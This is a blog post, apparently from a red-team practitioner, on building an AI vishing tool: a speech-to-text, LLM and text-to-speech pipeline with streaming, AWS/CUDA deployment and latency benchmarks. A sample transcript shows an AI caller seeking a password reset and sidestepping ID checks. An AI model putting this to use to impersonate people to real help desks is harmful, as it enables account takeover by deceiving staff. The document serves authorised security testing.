Developing An AI Vishing Model For £37.49

2025 was arguably the year of vishing, with the technique rapidly exploding in popularity among both red teams and real-world threat actors such as Scattered Spider. Having done some vishing myself, it can be a very nerve-wracking thing to do, requiring you to stay calm and think on the spot if you are challenged. Alongside this, I have wanted to improve my ability with AI models and concepts, so developing an AI-based vishing toolset felt like a natural fit.

For added fun, I wanted to do this as cheaply as possible, using free or low-tier tools and licences where possible. This has two benefits: if the tool works reasonably well on a low-tier licence, then it will fly when given a higher-bandwidth API. Additionally, it forces me to be more efficient and considered with my coding, rather than just throwing cash at more powerful APIs or EC2 instances.

This project had a few key aims which I wanted to deliver – hopefully placing it above other proofs of concept which exist, and perhaps allowing it to be used in real red team exercises. These aims were:

  • Modular design, allowing for voice generation and transcription models to be changed
  • Logging and IOCs tracked throughout by default
  • The ability to eavesdrop and alter the conversation, if the AI agent is going off track
  • Designed to allow testing and benchmarking to be performed easily
  • Sub 1s response time following incoming audio, though ideally even lower!

The aim of this blog is to highlight the decisions taken and add to the conversation around AI generated vishing. A number of detailed code samples will be skipped or not fully covered in this blog, so apologies for any big gaps or jumps in capability 😉

For anyone interested in this subject, ElevenLabs have some great blog posts. For example, they have a summary of how conversational AI agents are designed at a high level.

Milestone 1 – Basics

Initial Structure + Text To Speech

To start, let's make a basic model with a structure we can extend from. This needs to implement the core functionality for the toolset, allowing us to take an input audio source and generate an audio response from it. These steps are:

  • File/Input handler
  • Speech to Text (STT)
  • Text Generation (TG)
  • Text to Speech (TTS)
  • Output the audio
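The steps above can be sketched as a minimal harness. This is a sketch only – the class and function names are illustrative, not the project's real structure – but it shows the shape of one end-to-end pass, with each stage as a swappable callable:

```python
import time
from dataclasses import dataclass, field

@dataclass
class PipelineResult:
    transcript: str
    response_text: str
    audio_path: str
    timings_ms: dict = field(default_factory=dict)

def run_pipeline(audio_path, stt, text_gen, tts):
    """Run one STT -> TG -> TTS pass, timing each stage in milliseconds."""
    timings = {}

    t0 = time.perf_counter()
    transcript = stt(audio_path)          # Speech to Text
    timings["stt"] = (time.perf_counter() - t0) * 1000

    t1 = time.perf_counter()
    response = text_gen(transcript)       # Text Generation
    timings["tg"] = (time.perf_counter() - t1) * 1000

    t2 = time.perf_counter()
    out_path = tts(response)              # Text to Speech
    timings["tts"] = (time.perf_counter() - t2) * 1000

    return PipelineResult(transcript, response, out_path, timings)
```

Any provider can then be dropped in as a callable – the property which the interface work later in this post formalises properly.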

In order to test this, we will need some audio content. For a super dumb example, we can use https://ttsmp3.com/ to generate a basic script which we might face when vishing. Helpfully, we can add realistic pauses into the generated content where the agent won't be speaking. Below is a sample of the script used.

Hello, this is Test Help Desk 1, my name is John Smith. How can I help you? A password reset? Okay, what is your name please? Thank you Peter. What is your internal ID?

Now we have an audio file, let's start looking into audio transcription. This will allow us to convert input audio into text, so that we can then interface with an LLM of our choice when generating a response.

Side Note

This approach may not be the most performant, as it requires us to transcribe audio and then feed it to an LLM for each section of audio. This introduces a fair amount of latency due to us performing two transformations, rather than sending it straight to a service which can transcribe and generate text for us. My logic here was that the flexibility offered by choosing our own LLM is more important than out and out speed. With more powerful VMs in production usage, the performance hit should be low!

To ensure we can alter settings easily whilst producing this, each model and tool will have a YAML config. For example, the faster-whisper library was used initially, which then had the following config. This is heavily based on the default example for those familiar!

model:
  type: small
  device: cpu
  compute_type: int8
  cpu_threads: 8
transcribe:
  beam_size: 1
  vad_filter: true
  language: en # Null for auto-detect
  best_of: 1
  word_timestamps: false
  chunk_length: 60
  vad:
    min_silence_duration_ms: 100
    speech_pad_ms: 80
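For those unfamiliar with faster-whisper, a rough sketch of how a config like this might be consumed – the helper names here are mine, and the model itself is only loaded lazily so the config parsing can be tested without the library:

```python
from pathlib import Path
import yaml  # PyYAML

def load_stt_config(config_path):
    """Split the YAML above into WhisperModel kwargs and transcribe() kwargs."""
    cfg = yaml.safe_load(Path(config_path).read_text())
    model_cfg = cfg["model"]
    # The nested vad block maps onto vad_parameters in faster-whisper
    transcribe_cfg = {k: v for k, v in cfg["transcribe"].items() if k != "vad"}
    return model_cfg, transcribe_cfg

def build_model(model_cfg):
    # Imported lazily so config parsing works without the library installed
    from faster_whisper import WhisperModel
    return WhisperModel(
        model_cfg["type"],                       # e.g. "small"
        device=model_cfg["device"],              # "cpu" or "cuda"
        compute_type=model_cfg["compute_type"],  # e.g. "int8"
        cpu_threads=model_cfg["cpu_threads"],
    )
```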

To control the features, I made a basic controller to handle the coordination from reading audio files through to outputting a response, using the various steps mentioned earlier. This script takes a number of parameters, so we can switch between file-based audio, live input (microphone) and others in future. Before we can do an end-to-end generation, let's test that the transcription works.

DEBUG:Main:Starting transcription
DEBUG:Main:Audio transcription - 8007.0ms
 Hello, this is Test Help Desk 1, my name is John Smith. How can I help you? A password reset? Okay, what is your name please? Thank you Peter. What is your internal ID?

This shows the script works fine (ignoring the slow transcription!), though currently it requires us to have the full audio ready to be transcribed at once – for a call we will need to perform live transcription by recognising when pauses have occurred.

To get around this, we can use the detect_nonsilent function from pydub (in pydub.silence) to detect silent moments, allowing us to split the audio up at questions or natural pauses in the conversation.

import time
from os import path

from pydub.silence import detect_nonsilent

# Wrapper function added for completeness; TEMP_FOLDER and logger are module-level
def chunk_audio(audio, config, callback):
    # Detect non-silent chunks
    nonsilent_ranges = detect_nonsilent(
        audio,
        min_silence_len=config['min_silence_len'],
        silence_thresh=config['silence_thresh'],
        seek_step=config['seek_step']
    )

    # Process each segment
    segment_count = 0
    time_str = int(time.time())
    for i, (start_ms, end_ms) in enumerate(nonsilent_ranges):
        temp_file_name = path.join(TEMP_FOLDER, f"{time_str}_{i}.mp3")

        # Add silence padding if requested
        start_with_padding = max(0, start_ms - config['keep_silence'])
        end_with_padding = min(len(audio), end_ms + config['keep_silence'])

        # Extract the segment and save it to disk
        segment = audio[start_with_padding:end_with_padding]
        segment.export(temp_file_name, format="mp3")
        logger.debug(f"Found new chunk of audio, length = {segment.duration_seconds}s")
        logger.debug(f"Chunked audio saved to {temp_file_name}, Chunk number = {i + 1}")

        # Invoke callback with the segment file
        callback(temp_file_name)
        segment_count += 1

    return segment_count

We can then save each ‘chunk’ to disk, using the pause as a trigger for generating the response and then synthesising it into an audio response. This works well, with text being split out as expected.

DEBUG:STT:Audio transcription - 6132.0ms
INFO:STT:Transcribed audio =  Hello, this is test help desk one.
DEBUG:STT:Audio transcription - 4590.0ms
INFO:STT:Transcribed audio =  My name is John Smith. How can I help you?
DEBUG:STT:Audio transcription - 4602.0ms
INFO:STT:Transcribed audio =  A password reset

Code Structure

Around this point I realised I needed to actually structure the code I was generating. One big aim for the project was to allow for swapping of different configurations and platforms without complex code alterations. Naturally, this led me to making an interface for the various components – allowing for the underlying provider to be changed, whilst the functions remain and behave the same.

For example, our speech to text (STT) interface started with just a simple transcription function:

class STT:
    def transcribe_audio(self, content, format : AudioFormat):
        pass

This is then implemented by faster-whisper in our current example:

class FasterWhisper(STT):
    def __init__(self):
        self.config = loader.load_config("stt", "faster_whisper")

    def transcribe_audio(self, file_name):
        # model sizes: tiny, base, small, medium, large-v3 (bigger = better & slower)
        model = WhisperModel( ...

Likewise, to allow for better extensibility in future, I altered the controller function to ensure that one function is in charge of handling the scheduling and coordination of our workflow:

  • Transcribe incoming audio
  • Generate a response
  • Synthesise a response
  • Log our activity
  • Allow us to perform benchmarking

This controller then instantiates another class to handle each instance of this workflow – allowing us to track the messages sent and avoid repeating resource-intensive actions (such as initialising TTS/LLM models). At a high level, our controller looks like this:

class GenerationExecution:
    def __init__(self, controller, audio_file):
        self.audio_file = audio_file
        self.controller = controller

        self.transcribed_text = ""
        self.generated_text = ""

        # Convert the audio to text
        stt_handler_obj = stt_handler.STTHandler(self.controller.stt_model, audio.AudioFormat.FILE)
        self.transcribed_text = stt_handler_obj.handle_stt(audio_file)
        self.controller.add_message_history("user", self.transcribed_text)

        # Then forward onto our text generation
        self.text_gen_generation()

        # Then generate audio in time
        self.tts_generation()

...

class Controller:
    def __init__(self, stt_model, text_gen_model, tts_model):
        self.stt_model = stt_model
        self.text_gen_model = text_gen_model
        self.tts_model = tts_model
        self.generation_execution_runs = []

    def generate_response(self, input_audio):
        self.generation_execution_runs.append(GenerationExecution(self, input_audio))

Now back to the fun stuff!

Text Generation

At this point, I needed to make a text generation system. To start, I created an Anthropic account and put 5 hard-earned dollars into it. There are many other providers out there; I'm simply more familiar with Anthropic from previous projects. Using the Messages API, we can make a request to Claude as a chatbot. There are two prompts we can define:

  • System
    • The ‘base’ prompt, containing the formatting, guidelines and expectations.
    • This is the same for all requests, and won't change
  • Messages/User
    • This is the data we processed from our victim, so will be questions from a helpdesk agent and so on!
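A hedged sketch of how these two prompt types could be packaged for the Messages API – build_payload and the history format are my own illustration, and the actual SDK call is left commented out:

```python
def build_payload(system_prompt, history):
    """history: list of (role, text) tuples, oldest first.
    The Messages API expects strictly alternating user/assistant turns,
    so consecutive same-role entries are merged."""
    messages = []
    for role, text in history:
        if messages and messages[-1]["role"] == role:
            messages[-1]["content"] += " " + text
        else:
            messages.append({"role": role, "content": text})
    return {"system": system_prompt, "messages": messages}

# With the real SDK, this would then look something like:
# import anthropic
# client = anthropic.Anthropic()
# payload = build_payload(system_prompt, history)
# reply = client.messages.create(model=..., max_tokens=150, **payload)
```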

As always, we will place both of these into configuration files, so we can alter them easily. From a quick test run, we can see that Claude makes sensible responses as expected.

Message 1:  Hello, this is test help desk one.
Message 2: Hi there, I'm calling because I need help with resetting my password.
Message 3:  My name is John Smith. How can I help you?
Message 4: Hi John, I'm Peter Bloggs. I've been locked out of my account and need to get my password reset please.
Message 5:  A password reset
Message 6: Yes, that's right. I can't seem to get into my account at all.
Message 7:  Okay, what is your name please?
Message 8: It's Peter Bloggs.
Message 9:  Thank you Peter. What is your internal ID?
Message 10: I'm afraid I don't have that to hand. Is there another way you can verify me?

At this point, we are starting to get a pretty messy terminal with debug messages flying everywhere, so lets generate a proper UI for this. A solid but basic UI will allow for a huge amount more to be built in this tool, without me wasting time debugging and digging through text logs manually.

As with all good code, I'm going to heavily vibe code it using Claude. With one prompt, we suddenly have the majority of the framework built for our interface. For reference, the prompt is below (though my prompt writing has improved as a result of this project!)

Write a python flask server which has 3 different pages. 

The first is config, which allows users to browse and edit yaml configuration files within a specific directory and should dynamically generate the fields which can be edited based on the file contents. 

Secondly is logs, which displays output from a separate API call, this must be displayed in a table with the following columns: timestamp, id, conversation id, details, type. Change the timestamp to the format of 12:34 1st Jan. Allow for the table to be sorted and filtered. this other API returns a JSON structure from tiny db. 

Finally 'manage', will poll this main API every 100 ms for a specific conversation ID. it should show the same table at the top of the page, then the second half should be split in half, with one half having an input field to allow conversations with a chatbot via an API call - build this framework but dont implement backend chatbot actions. The other half should show another chat-style window based on a separate API call, showing sent and received messages with timestamps - implement the API call but dont perform any backend actions.

The design should be simple and modern, with navigation on the left hand side. Use bootstrap for HTML and jinja for templating. design the site to use a 'base' template which is then extended out for the 3 pages. Use blocks where possible. For the API, define API functions based on JSON output where required, rather than implementing in Python specifically.

With a few tweaks to add better quality-of-life features, such as static file folders and a ‘base’ template for inheriting styling within Jinja, we have a basic interface. The main page is the ‘Manage’ page, which will allow for live inputs to the system, a ‘chat’ window for the conversation and a view of the system’s logs.

We also have a ‘Logs’ view, for viewing logs across all conversations/calls.

And finally, a configuration file manager, so we can tweak the settings via the UI rather than YAML.

Text To Speech

Now for the final piece of the jigsaw – Text To Speech (TTS)! For this, we will use pyttsx3 so that we can test whilst not burning through our free allowance with more mature APIs such as ElevenLabs. We can use the example code to create our TTS engine, allowing us to save the file to disk before playing it back as a response. This is a laughably small amount of code to generate responses on the fly – barely a dozen lines.

import pyttsx3
from handlers.config import loader
from models.tts import TTS

class PyTTSX3(TTS):
    def __init__(self):
        self.config = loader.load_config("tts", "pyttsx3")
        self.engine = pyttsx3.init()

    def generate_audio(self, input_text):
        file_path = self.get_file_path()
        self.engine.save_to_file(input_text, file_path)
        self.engine.runAndWait()  # Flush the queue so the file is actually written
        return file_path

Now we have a very basic end-to-end vishing tool, except for handling the input and output of data to a vishing interface, which will be tackled later on.

Benchmark

To conclude this first major milestone, I made a dashboard which shows the metrics associated with each vishing ‘call’. This allows for comparison between techniques, and for any improvements to be analysed. At this point I also switched from TinyDB to SQLite, as TinyDB wasn't able to cope with concurrent read/write actions, causing significant data loss even at this stage!
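For the curious, the replacement is essentially a single activity table; a minimal sketch (the schema and helper names are illustrative, not the tool's actual ones), with WAL mode being the standard fix for letting readers coexist with a writer:

```python
import sqlite3
import time

def open_activity_db(db_path=":memory:"):
    conn = sqlite3.connect(db_path)
    # WAL allows concurrent readers while one writer appends
    conn.execute("PRAGMA journal_mode=WAL")
    conn.execute("""CREATE TABLE IF NOT EXISTS activity (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        timestamp REAL NOT NULL,
        conversation_id TEXT NOT NULL,
        type TEXT NOT NULL,
        details TEXT)""")
    return conn

def log_activity(conn, conversation_id, activity_type, details):
    conn.execute(
        "INSERT INTO activity (timestamp, conversation_id, type, details) "
        "VALUES (?, ?, ?, ?)",
        (time.time(), conversation_id, activity_type, details),
    )
    conn.commit()
```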

As you can see below, this first version is pretty slow, though it is significantly faster than I suspected. This is especially the case given how realistic both the text and audio responses are. Whilst there is significant room for improvement in the quality of the responses, this is very much early days!

The initial benchmarks result in the following performance:

Milestone | STT      | Text Generation | TTS      | Total
1         | ~5500 ms | ~3500 ms        | ~1300 ms | ~10000 ms

There are several caveats at this point:

  • Local generation via pyttsx3 is significantly slower than ElevenLabs was using the eleven_turbo_v2_5 model (~1300ms vs ~500ms), though for the purposes of testing I will stick with local methods where possible to keep spending down. Regardless, the main time sinks here are TTS and text generation.
  • My personal computer is getting pretty old, so these stats are using CPU only modes on a CPU from 2014…
    • This does mean we can rapidly increase performance by dedicating more resources to it in time though!

Milestone 2

The aim for this milestone is to make the tool more production ready and performant. The site made in Milestone 1 will allow us to debug and investigate performance, so is unlikely to need many changes for this milestone.

Before diving into the more exciting side of things, I moved part of the build process to EC2 Image Builder, which allows for the logic for AMI generation to be split from the deployment infrastructure. We can then extend this in future to handle test frameworks and so on. For now it will help us to speed up deployments by avoiding common build steps, creating the EC2 instances from an AMI. A short sample of the build code is below.

phases = [
  {
    name = "build"
    steps = [
      {
        name   = "MakeDirs"
        action = "ExecuteBash"
        inputs = {
          commands = [
            "sudo mkdir -p /opt/app",
            "sudo chown -R ubuntu:ubuntu /opt/app",
          ]
        }
      },
      {
        name   = "InstallPackages"
        action = "ExecuteBash"
        inputs = {
          commands = [
            "sleep 20",
            "cd /opt/app",
            "sudo apt update",
            "sudo NEEDRESTART_MODE=a apt install unzip python3-virtualenv ffmpeg dos2unix espeak-ng libespeak1 -y",
          ]
        }
      },

Text Generation

To start with a quick win, the text generation function was tweaked across several areas:

  • Improving the prompt used
  • Assessing other models
  • General performance improvements

Initially, I used Claude to assess my prompt and highlight any improvements, taking it from 234 to 119 tokens. Additionally, I switched to the ‘Haiku’ model, rather than ‘Sonnet’, which is focused on performance over out and out capability. This simple set of tweaks dropped the text generation down to ~2250ms, saving us over a full second on the response, mostly due to the use of the ‘Haiku’ model.

WebSockets

The next fairly major change was to add support for streaming audio formats, which will be the vast majority of use cases for the actual usage of the tool. For example, streaming the audio output from a PBX system into the tool, then streaming data back out. This naturally has significant speed benefits, but comes with a host of bugs and other considerations – who knew how hard it was to know when someone has finished talking and to process the data as soon as possible, whilst not stopping at the wrong time!?

When developing this, I wanted to be able to support multiple conversations from streamed data. This meant generating an ID or key during the initial websocket connection, then using that to ensure data was forwarded to the correct controller. This would allow a single instance of a server to receive multiple calls, which meant I wouldn’t need to restart after each call whilst testing. It in theory could allow for one server to handle multiple vishing calls, though this would lead to a performance hit I am sure!

@socketio.on('input_audio')
def ws_input_audio(chunk):
    session_id = request.sid
    data = b64decode(chunk)

    if session_id not in incoming_streamed_data:
        controller_instance = controller.Controller(main_config['stt']['model'], main_config['text_gen']['model'], main_config['tts']['model'])
        incoming_streamed_data[session_id] = audio.AudioSectionGroup(session_id, controller_instance)
        
    incoming_streamed_data[session_id].add_data(data)
    logger.debug("Received data length = " + str(len(incoming_streamed_data[session_id].data)))

In the early days of this development, this did lead to Claude getting a little exasperated as data was being processed in an incorrect order.

At this point I also split the testing and development logic into a separate client.py file. This sits within the same folder so that the existing audio processing logic can be re-used, giving us a ‘client’ which can listen and respond to the output of our vishing server. I also moved the command line parameter functionality into a configuration file, so that logic could again be shared between the client and server. Whilst tying the client and server together isn't ideal, they will inherently be closely linked, so it felt like a fair trade-off, as we will use similar models across both.

After some tweaking, behaviour was back to what we were seeing before when reading the file directly from disk, with ~9 second response times. This was mainly achieved by using a sleep call to slow down the rate at which the data was being sent via websockets, effectively making the transmission rate of the file match what would be seen if we were using a microphone/live input – rather than it transmitting the entire conversation in milliseconds. Due to the slow speed of the processing, we do still see some ‘non ideal’ behaviour, with responses being generated after the next sentence has begun.
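The throttling was the key trick here. A sketch of pacing file chunks at the real-time rate (the function and parameter names are mine; the send callable would be the websocket emit in practice):

```python
import time

def stream_at_realtime(data, bytes_per_second, chunk_size, send, sleep=time.sleep):
    """Send `data` in chunks, sleeping between them so the wall-clock
    rate matches what a live microphone would produce."""
    delay = chunk_size / bytes_per_second
    for offset in range(0, len(data), chunk_size):
        send(data[offset:offset + chunk_size])
        sleep(delay)
```

Injecting `sleep` as a parameter also makes the pacing logic trivially testable without real delays.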

At this point, the STT/TG/TTS workflow is triggered whenever we mark a section of audio as ‘complete’ – i.e. when we have found a silent section at the end of the received audio stream. Whilst this isn't perfect, as we will have some natural latency after any response, it works for now. The logic to handle when we trigger this workflow is shown below:

# Save audio segment
segment.export(file_name, format="mp3")
handler.audio_data.section_updated(file_name, duration_with_padding)

if is_speech_ended:
    # This means we have found a silence - aka the end of a bit of speech, which will ultimately lead to triggering the STT/TG/TTS flow
    logger.info(f"Marking segment as complete. Details = {timestamp_data}")
    handler.audio_data.mark_last_section_completed()
elif last_section is None or last_section.completed:
    # We have found the start of a new audio section
    handler.audio_data.add_section(file_name, start_ms_overall, (end_with_padding - duration_with_padding)) 

The key items here are the mark_last_section_completed and section_updated callbacks, which allow us to track when new input has been received, or a sentence has finished. When mark_last_section_completed is called, the below code is called:

# Convert the audio to text
self.speech_to_text()

# Then forward onto our text generation
if self.transcribed_text == "":
    self.controller.activity_handler.insert_activity(Activity(self.controller.id, self.id, activity_type=ActivityType.DEBUG, description="Insufficient Text", details="TG and TTS Skipped"))
else:
    self.text_gen_generation()

    # Then generate audio
    self.text_to_speech()

As you can see, this is processed sequentially, which has significant performance implications, but again will work for now whilst we focus on other areas. The section_updated logic helps to future-proof the system, potentially allowing for pre-generation of responses in future.

To The Cloud!

The next step I wanted to explore was deploying the infrastructure to the cloud. Naturally, this was done using Terraform. I also developed a small script to further automate this process and handle some utility functions such as deploying environment variables and creating files, which can be more tricky in pure Terraform.

This is a pretty standard deployment, using AWS to host all of our infrastructure. To start with, I tested using a weedy t3.micro resource, which proved that the theory of the client/server model using AWS was possible (Though horrifically slow). For a point of comparison, I decided to run a series of benchmarks to see what throwing more compute power would do, using four different flavours of EC2, including a GPU-enabled instance (g4dn). This was all done using the following settings:

  • STT – Faster Whisper
  • TG – Anthropic
  • TTS – gTTS
    • This was used as pyttsx3 does not work nicely on Linux

Notably, this won't play to the strengths of the GPU in the g4dn instance – but this is just for comparison's sake at this point. The g4dn family was chosen as it uses NVIDIA GPUs, rather than the g4ad family which uses AMD. The delta between g4dn and the t3 family will only increase as we move to more complex processing types and further refinement of the algorithm. All durations below are in milliseconds.

Type        | Detail                                        | STT   | TG   | TTS  | Total | Relative Speed
t3.micro    | 2 vCPU, 1GB RAM, no GPU                       | 15100 | 1200 | 1000 | 17400 | 100%
t3.xlarge   | 4 vCPU, 16GB RAM, no GPU                      | 9100  | 1600 | 1000 | 11700 | ~150%
t3.2xlarge  | 8 vCPU, 32GB RAM, no GPU                      | 7500  | 1000 | 1000 | 9700  | ~180%
g4dn.xlarge | 4 vCPU, 16GB RAM, 1 GPU (CPU-specific models) | 5500  | 1250 | 750  | 7600  | ~230%

This highlights some interesting things:

  • TG dropped a further ~1000ms by hosting in the cloud, due to the higher bandwidth available
  • STT responds well to increasing resources, though increasing resources only goes so far

It is also worth highlighting that by default, AWS accounts cannot create g4dn instances! You need to submit a quota request for “All G and VT Spot Instance Requests”, which correlates to the number of vCPUs you need. Bear in mind that the smallest g4dn instance has 4vCPUs – so you need to request at least 4! I requested 16 but was allowed 8, enough for a g4dn.2xlarge. Later I managed to get this increased to 32 with a follow up request.

CUDA

This small section of text represents a few weeks of work and me bashing my head against the wall. Support for CUDA is not especially well documented in my opinion, but eventually I got there! The key decision here was to switch to the official NVIDIA GPU-Optimized AMIs, rather than the generic Ubuntu image I was using previously.

This won't work out of the box, so I had to run some additional commands to install the necessary prerequisites for the various Python libraries. The specific versions of the libraries make a huge difference, with the cu12 and 12-8 versions respectively matching up with the GPU available at the time of writing.

pip install nvidia-cudnn-cu12
sudo apt install cuda-libraries-12-8
echo "export LD_LIBRARY_PATH=$(python -c "import nvidia.cublas.lib; import os; print(os.path.dirname(nvidia.cublas.lib.__file__))"):/usr/local/cuda-12.8/lib64:\$LD_LIBRARY_PATH" >> ~/.bashrc
source ~/.bashrc

As a point of comparison, STT times drop by several seconds(!) by doing this – halving the time taken per response on the same hardware.

Type        | Detail                                        | STT  | TG   | TTS  | Total
t3.2xlarge  | 8 vCPU, 32GB RAM, no GPU                      | 7500 | 1000 | 1000 | 9700
g4dn.xlarge | 4 vCPU, 16GB RAM, 1 GPU (CPU-specific models) | 5500 | 1250 | 750  | 7600
g4dn.xlarge | 4 vCPU, 16GB RAM, 1 GPU (GPU-enabled models)  | 1500 | 1000 | 750  | 3250

When looking into the data, this figure is somewhat misleading. The first request is notably slower than subsequent requests, likely as a result of the model being loaded into memory. The typical figure is closer to 1250ms for STT, instead of 1500ms. This bottleneck was therefore very high on my list of items to sort!

At the end of this milestone, performance has been significantly improved, largely due to the support for CUDA enabled EC2 instances, as well as a host of tweaks throughout the code.

Milestone   | STT      | Text Generation | TTS      | Total
1           | ~5500 ms | ~3500 ms        | ~1300 ms | ~10000 ms
2           | ~1500 ms | ~1000 ms        | ~750 ms  | ~3250 ms
Improvement | 360%     | 350%            | 175%     | 300%

Milestone 3

The aim for this milestone is to push closer to usable performance. Whilst a ~3 second response time isn't bad, it isn't sufficient for real world usage and would rapidly make any helpdesk suspicious that the caller is AI generated or a bot. Some of the key areas to be tackled here are:

  • Exploring on-host LLMs to increase TG speed
  • Improving code structure

On Host LLMs

There are a range of LLMs out there which run on the host; my priority here was to find one which was easy to use whilst still being performant. A number of solutions required extensive prerequisites, which may be useful in future but not for now! The option I settled on was llama.cpp (via llama-cpp-python), which can be installed with the following:

pip install llama-cpp-python --extra-index-url https://abetlen.github.io/llama-cpp-python/whl/cpu

We need to provide a model to use with llama-cpp, I ended up testing two different models:

Again, this was quite a simple model to use, so long as you are loading a model compatible with llama-cpp. A short sample of the warm up code is below, though more on that shortly!

config = loader.load_config("text_gen", "llama_cpp")
model_path = path.join("hf", config["model"])

if not path.exists(model_path):
    logger.error(f"Model file not found: {model_path}")
    _global_llama_initialized = True
    return None

logger.info(f"Loading LlamaCPP model from {model_path}.")
_global_llama_client = Llama(model_path=model_path, n_gpu_layers=-1, verbose=False)
_global_llama_initialized = True

# Warmup the model
logger.info("Warming up LlamaCPP model.")
try:
    warmup_messages = [
        {"role": "system", "content": "You are helpful."},
        {"role": "user", "content": "Hi"}
    ]
    with _llama_lock:
        _global_llama_client.create_chat_completion(
            messages=warmup_messages,
            max_tokens=1,
            stream=False
        )
    logger.info("LlamaCPP model warmed up successfully")
except Exception as e:
    logger.warning(f"LlamaCPP warmup failed: {e}")

As a point of comparison, I re-used the Bedrock example I had previously created, which would generate 100 tokens in 1.4 seconds (71 TPS), or 160 tokens in 1.9 seconds in a separate test (83 TPS). This highlights one of the current cruxes with AI vishing tools – whilst powerful local GPUs can have high performance, you need a lot of power to increase the TPS and reduce latency.

In my example, you would likely need a g4dn.12xlarge or above to get an equivalent TPS to a simple API call – at a cost of £3/hour vs practically nothing for an API call. The obvious downside is the slow response time; over 1 second just to generate a text response is far too high for use in a real vishing scenario. This doesn't consider the capability of the models either, with on-host ones generally being less capable in my experience, though increasing the complexity of the models would likely close this gap, should you have a powerful enough system.

Streaming & Warm Ups

Whilst I was pondering how best to get around that slight elephant in the room, I decided to tackle something a bit more in my grasp by adding streaming support to the various handlers, as well as changing the controller to leverage this new functionality. A big advantage of this is that we can start to generate responses whilst we are still processing incoming data, allowing us to further reduce the time taken in our responses, by reducing the Time To First Token (TTFT) value.
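To make TTFT measurable, the handlers share a small stream consumer; a generic sketch (names are mine) which works on any iterator of text chunks, such as those yielded by the Anthropic SDK or llama-cpp with stream=True:

```python
import time

def consume_stream(chunks, on_first_token=None):
    """Concatenate a token stream, recording time-to-first-token in ms."""
    start = time.perf_counter()
    ttft_ms = None
    parts = []
    for chunk in chunks:
        if ttft_ms is None:
            # First chunk has arrived - this is our TTFT
            ttft_ms = (time.perf_counter() - start) * 1000
            if on_first_token:
                on_first_token(ttft_ms)
        parts.append(chunk)
    return "".join(parts), ttft_ms
```

The on_first_token callback is where downstream work (e.g. kicking off TTS) can begin before the full response has arrived.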

Additionally, I shifted the models to use warm-ups, so that we aren't loading the models from cold on the initial request. This can be very significant with larger models, given their increased resource requirements over what we are currently using.

I also implemented some other strategies which commonly yield performance benefits, though I found they did not lead to noticeable improvements. The first concept involved slimming the system prompt down by around half to reduce the number of tokens transferred. In reality, I found that this was actually quite negative, as responses were now much poorer quality and there was no significant difference in the response time. As the prompt was already reasonably small (~300 tokens), this would likely be of use for larger system prompts, but wasn’t worth the time currently for me.

Another approach was to cache messages, allowing the various models to use cached memory rather than loading the full conversation each time. In theory this is great, though again this did not lead to any improvement for me. Buried within the documentation, Claude states the following:

The minimum cacheable prompt length is:

  • 4096 tokens for Claude Opus 4.5
  • 1024 tokens for Claude Opus 4.1, Claude Opus 4, Claude Sonnet 4.5, Claude Sonnet 4, and Claude Sonnet 3.7 (deprecated)
  • 4096 tokens for Claude Haiku 4.5

With most of our conversations being shorter than that, it won't actually lead to a performance benefit currently. The other models all had similar requirements to Claude.

Audio Pre Generation

Another basic thing to implement was pre-generation of audio content: taking the items we defined in our configuration about the target, such as dates of birth and addresses, and generating typical audio responses for when we are prompted for them.

This should be a big timesaver, as we can prepare for common questions and skip performing TTS on them, though we still need to perform TG, as we need to know which audio to use. Potentially, this also allows us to use far simpler and quicker models. With some AI wizardry, we now have a nice shiny page to show this, allowing us to review the audio and regenerate as needed.

I then extended the prompt, so that if it determined that it was being asked for any of these pieces of information, then it should just return that in the response. This means we can then skip TTS for any of those matching questions. For final deployment, the logic will pick up on this and play the relevant audio file – but for now we will just print it to the log!
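As a sketch of that routing (the `[PREGEN:...]` marker format is a hypothetical convention I'm using for illustration, not necessarily the one in the project), the controller only needs to match the model’s output against the pre-generated set:

```python
import re
from pathlib import Path

# Hypothetical marker convention: the TG prompt is asked to answer with
# "[PREGEN:<key>]" when the question matches a pre-generated item.
PREGEN_AUDIO = {
    "dob": Path("pregen/dob.wav"),
    "address": Path("pregen/address.wav"),
}

MARKER = re.compile(r"^\[PREGEN:(\w+)\]$")

def route_response(tg_output: str):
    """Return a pre-generated audio path if the model flagged one,
    otherwise None (meaning the text should go through TTS as normal)."""
    match = MARKER.match(tg_output.strip())
    if match and match.group(1) in PREGEN_AUDIO:
        return PREGEN_AUDIO[match.group(1)]
    return None
```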

Putting these two concepts together, we can start to see some promising results, with specific questions now having usable response times (Sub 1s). I decided to extend the analysis page to include two additional metrics:

  • STT Start → First TG Token
    • This shows the time taken from when the caller stops talking, to when we generate our first section of the text response
    • Effectively this is the Time To First Token (TTFT) for both STT and TG combined
  • STT Start → First TTS Chunk
    • This shows the time taken from when the caller stops talking, to when we generate our first section of the audio response
    • Effectively this is the Time To First Token (TTFT) for STT, TG and TTS combined

As a result, some of the values for the STT, TG and TTS columns now do not match with these two new metrics. This is because those columns track the time taken to perform the entire process, rather than the TTFT.

Several things stand out now:

  • I have yet to properly fix the initialisation bug with STT, as the first request is ~4x slower than others
  • When we can match a response to pre-generated content, it can respond quite quickly (600ms)
  • TTS is still quite slow and is the next bottleneck
    • As it now regularly generates the initial text response at 600ms, with a fast enough TTS API it is quite possible that sub-1 second responses could be attained.

Focus(ing on) ST(T)

As mentioned, I wanted to fix the initialisation bug in the STT models, which was easily resolved by altering the initialisation logic within the main controller class. This now warms up and performs a test generation with the various models prior to starting any of the vishing process.
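As an illustration of the warmup idea (the handler class and method names here are hypothetical stand-ins, not the project’s real classes), running a throwaway inference before the call starts moves the cold-start cost out of the first real request:

```python
import time

class DummySTTHandler:
    """Hypothetical stand-in for an STT handler whose model loads lazily."""
    def __init__(self):
        self._loaded = False

    def transcribe(self, audio: bytes) -> str:
        if not self._loaded:
            time.sleep(0.2)  # simulate the slow first-time model load
            self._loaded = True
        return "transcript"

def warm_up(handlers) -> None:
    """Run a throwaway inference on each handler before any real audio,
    so the first request of the call doesn't pay the cold-start cost."""
    for handler in handlers:
        handler.transcribe(b"\x00" * 1600)  # short buffer of silence

stt = DummySTTHandler()
warm_up([stt])
```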

I also added support for silero-vad, which is a Voice Activity Detection (VAD) algorithm, which may allow more flexibility than the previous pydub model. LiveKit have a great blog post on this, which also covers EOU (End Of Utterance) algorithms, which can pre-empt when a user is about to finish talking – though this is an option for the future!
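silero-vad itself is a small neural model, but the problem it solves can be sketched with a naive energy-threshold VAD over 16-bit PCM frames. This is a deliberately crude stand-in to show the concept, not how silero-vad works internally:

```python
import struct

def frame_is_speech(frame: bytes, threshold: int = 500) -> bool:
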